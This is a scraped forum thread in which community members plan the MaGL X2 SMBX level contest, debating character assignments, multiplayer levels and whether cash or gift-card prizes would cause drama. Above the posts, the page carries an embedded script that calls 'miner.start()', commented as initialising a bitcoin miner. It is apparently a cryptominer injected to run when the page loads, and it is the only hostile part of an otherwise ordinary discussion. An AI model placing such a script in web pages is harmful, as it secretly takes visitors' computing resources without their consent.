<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmbx communitypge project

MaGL X2 Planning Thread! Please be civil Σ( ̄□ ̄|||)

?

Flarn
58%
Breen
42%

Total votes: 53

Razzling
Maximum gay
First name: Josie
Pronouns: she/her

Re: MaGL X2 Planning Thread! Please be civil Σ( ̄□ ̄|||)

Postby Razzling » 5 years ago

I actually really like the random characters idea, in the first MaGL it felt like that most of the levels were designed around mario, just without a filter (and that the ones that did have a mario filter just had some npcs refer to mario by name or something.) So I'm excited to see more peach levels and stuff (were there even any legit peach levels in the first MaGL?)

also I was aslo totally considering trying out for that judge position thingy and then remembered I cant play smbx worth shit on the keyboard

TiKi

Postby TiKi » 5 years ago

Toad, Peach and Link could only use mushrooms and the fireflower (the ice flower wasn't implemented) in SMBX 1.2.2. I'd say to be grateful but then again how do you do that type of thing when making a new character?!?

Slit08

Postby Slit08 » 5 years ago

Would it be okay, if I would actually participate in a MAGL X contest for once as someone who tries to make a Level?
[ img ]http://www.loadthegame.com/wp-content/u ... 4jun14.jpg[/ img ]

Night comes and with it terrible horrors.

The hunt begins!

QubicTom
Pleasantly Confused
First name: Tom

Postby QubicTom » 5 years ago

If you get a random character you don't like, Make A Good Karoshi Room for them at the start of the level :twisted:

Hoeloe
A2XT person

Postby Hoeloe » 5 years ago

More than anything, I'm concerned about being given a combination like Mario & Luigi, because I kind of want to try a level designed for two or more players (I have some fun ideas), but they play so similarly that it would pretty much be a waste.

HamsterZerg
True Pacifist or bust.
Pronouns: he/him/his
Location: Oh, don't mind me. I'm just contacting you from the distant past. Carry on.

Postby HamsterZerg » 5 years ago

On the issue of character filters, if I remember correctly, there was a level in MAGLX1 called "Green Mystery" that had Luigi and Link show up as NPC's within the level itself. And then raocow's level from the same contest had a Mario-only filter because of something Peach said about Mario coming out of a star's anal cavity. So, really, things like these would require there to be character filters so that the levels would make sense. Yes, even if the levels take place in Gensokyo.

Avatar by Skully (artwork) and bkamakaze (size). Thanks, guys!
Soma Cruz, Linkara, and Olimar for SMBX 2.0

Game King-style Story Briefs, a forum game by me

Tenlade

Postby Tenlade » 5 years ago

Hoeloe wrote:More than anything, I'm concerned about being given a combination like Mario & Luigi, because I kind of want to try a level designed for two or more players (I have some fun ideas), but they play so similarly that it would pretty much be a waste.
similar to this, would doing supermario2/superbdemo2 cheat for having 2 characters out you can swap between be ok for a contest? id love to do some levels based around that.

The Destroyer of Worlds
I am become death

Postby The Destroyer of Worlds » 5 years ago

I am currently debating on including a monetary prize.

I am thinking of 20 dollars on steam for first place, 10 for second, and 5 for third.

What think?
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

sedron
im proud of you kid

Postby sedron » 5 years ago

Horikawa Otane wrote:I am currently debating on including a monetary prize.

I am thinking of 20 dollars on steam for first place, 10 for second, and 5 for third.

What think?
It's a nice thought, but I think you're gonna end up with people getting way too serious about the whole thing (even moreso than they already do,) and some people are going to be upset by missing the cutoff or something. This should be a light-hearted, no stakes thing, right?

Nimono

Postby Nimono » 5 years ago

I think a prize would be just fine. Sure, not everyone will get something, but this is supposed to be for fun, right? THAT'S the real reward here! ;)

sedron
im proud of you kid

I just think it'll cause more drama than necessary. Not everyone is going to be level-headed and reasonable about it like you, Riolu. =P

Nimono

Postby Nimono » 5 years ago

sedron wrote:I just think it'll cause more drama than necessary. Not everyone is going to be level-headed and reasonable about it like you, Riolu. =P
Oh uh, heh, thanks. (On that note, is it possible to get a namechange here? Been wondering that a while.) How exactly would it cause drama, though? The worst I can think of is some people complaining about how whoever got first is somehow undeserving of it, but even without a prize, wouldn't they do such a thing anyway? Aside from that, I could forsee many people joining in who otherwise wouldn't just for a chance to win that prize, but is that necessarily a bad thing? Those people might have fun with the editor and go on to continue using it to make excellent levels. ...perhaps. Possibly. You never know!

sedron
im proud of you kid

Riolu180 wrote:
sedron wrote:I just think it'll cause more drama than necessary. Not everyone is going to be level-headed and reasonable about it like you, Riolu. =P
Oh uh, heh, thanks. (On that note, is it possible to get a namechange here? Been wondering that a while.) How exactly would it cause drama, though? The worst I can think of is some people complaining about how whoever got first is somehow undeserving of it, but even without a prize, wouldn't they do such a thing anyway? Aside from that, I could forsee many people joining in who otherwise wouldn't just for a chance to win that prize, but is that necessarily a bad thing? Those people might have fun with the editor and go on to continue using it to make excellent levels. ...perhaps. Possibly. You never know!
I've seen fights break out for far more mundane reasons. The endgame of MaglX led to some pretty nasty fighting in the LP thread. You can root around through the Graveyard and find it if you wanna see what I mean. Even without that example, fights break out and people get upset all of the time here (and in places in general, honestly.)

Looking through the old MaglX thread and the argument thread, I also see that the fact that there weren't any prizes up for grabs was repeatedly mentioned. It was used as defense for the entire contest being a lighthearted, no-stakes affair. Nobody seemed to be of the opinion that it would be a good idea to have them.

Would it be bad for more people to join just for a shot at the prize? I can't say for sure, but I think it'll attract more low/garbage tier stuff. That's not really the best.

Horikawa, it's really cool that you're even entertaining the idea of prizes with monetary value. You already know that the contest is going to be riddled with arguments and drama to begin with, simply by virtue of being a Magl contest. Giving the contest stakes is going to add fuel to the fire. I already assume DeePay and others are going to crawl out of the woodwork and cause problems regardless. I don't think adding prizes will be beneficial enough to offset the problems it will undoubtedly cause.

Like, don't get me wrong, this is obviously my opinion and despite that I'd be grateful to have a chance at winning something. I just don't think that's worth it when it could make something like the Magl drama of last year happen again, only way worse.

pholtos
Loves adorable things.

Postby pholtos » 5 years ago

Rio if you would like a name change, message Rena.

I'm... assuming you mean your name on this forum.
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Dealer of the Pokermon Discord Tourneys.

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

I do LPs, check them out if you'd like.

Currently playing:

The 500 char limit is evil. :P

Doctor Shemp
Banned

Postby Doctor Shemp » 5 years ago

What think?
It's an interesting idea in principle but not everyone uses Steam or wants to. Besides, I agree with Dilbert's mum that vouchers are the worst gift ever anyway, as they're money without the prime virtue of money - that you can do whatever you want with it.

Luckily, you can maximise the utility of the money while maintaining its level of irritation by making the prize in dogecoin.

cheez8
Food Nut

Postby cheez8 » 5 years ago

I'm kind of going to agree with Sedron here. MaGL has pretty clearly been just for fun in the past, and a monetary prize could undermine that very easily. Not only would we have people entering and hoping for prizes rather than the spirit of the thing (y'know, fun) but there'd be a whole lot more justification for people to complain about placement, even though opinions will ultimately still be opinions, because now you're making those opinions determine who gets the money. It's just a big can of worms waiting to be opened.
I don't really get it but okay

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 5 years ago

too bad saltybucks aren't transferable
the chillaxest of dragonsImage
ImageImage

pholtos
Loves adorable things.

Postby pholtos » 5 years ago

raocow wrote:too bad saltybucks aren't transferable
I would totally give away saltybucks as a prize if I could.
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Dealer of the Pokermon Discord Tourneys.

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

I do LPs, check them out if you'd like.

Currently playing:

The 500 char limit is evil. :P

Razzling
Maximum gay
First name: Josie

Postby Razzling » 5 years ago

If there was to be a prize for winning, it probably should be something non-consequential so there is no downside to not winning, like one of those signature award banner thingies that I'm bad at describing, or perhaps just various quality drawings of money based on the position you get.

or maybe the winner can win the joy of being the winner

sedron
im proud of you kid

Razzling wrote:If there was to be a prize for winning, it probably should be something non-consequential so there is no downside to not winning, like one of those signature award banner thingies that I'm bad at describing, or perhaps just various quality drawings of money based on the position you get.

or maybe the winner can win the joy of being the winner
In the past contests, the winner just got their name in a red font on the forums. Not as pretty as a banner, but similar in concept.

ano0maly
Discord User

Postby ano0maly » 5 years ago

A monetary prize might work better with a smaller scale contest that's more for existing talkhausers.

Also, a question: are we having the contestants' avatars in the hub somewhere? If so, does it have to be your current avatar on talkhaus?
Image The talkhaus Discord server. Come ask for an invite to join!

Now the sole biggest

Isrieri
Creatively Bankrupt
Pronouns: Male

Postby Isrieri » 5 years ago

I personally figure its enough of a prize to have raocow play the levels. God that sounds so cheesy, but I do feel that way honestly.

Septentrion Pleiades
Banned
First name: Stephen

Postby Septentrion Pleiades » 5 years ago

Isrieri wrote:I personally figure its enough of a prize to have raocow play the levels. God that sounds so cheesy, but I do feel that way honestly.
I admit that that alone was my motivation for my six A2MT levels.

The Destroyer of Worlds
I am become death

Postby The Destroyer of Worlds » 5 years ago

Doctor Shemp wrote:

What think?
It's an interesting idea in principle but not everyone uses Steam or wants to. Besides, I agree with Dilbert's mum that vouchers are the worst gift ever anyway, as they're money without the prime virtue of money - that you can do whatever you want with it.

Luckily, you can maximise the utility of the money while maintaining its level of irritation by making the prize in dogecoin.
I'm not doing doge or bitcoin.

I'd be willing to change it from 'steam' to 'a thing of your choice that has online gift cards, such as steam, gog, etc'
ano0maly wrote:A monetary prize might work better with a smaller scale contest that's more for existing talkhausers.

Also, a question: are we having the contestants' avatars in the hub somewhere? If so, does it have to be your current avatar on talkhaus?
The judges will have avatars, but the contestants will not.
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

Slit08

Postby Slit08 » 5 years ago

When would we start with creating our own Levels for MAGL X? I ask because I'm writing my last test for this University Semester on February 3rd and won't have time before that.
[ img ]http://www.loadthegame.com/wp-content/u ... 4jun14.jpg[/ img ]

Night comes and with it terrible horrors.

The hunt begins!

Return to “archive”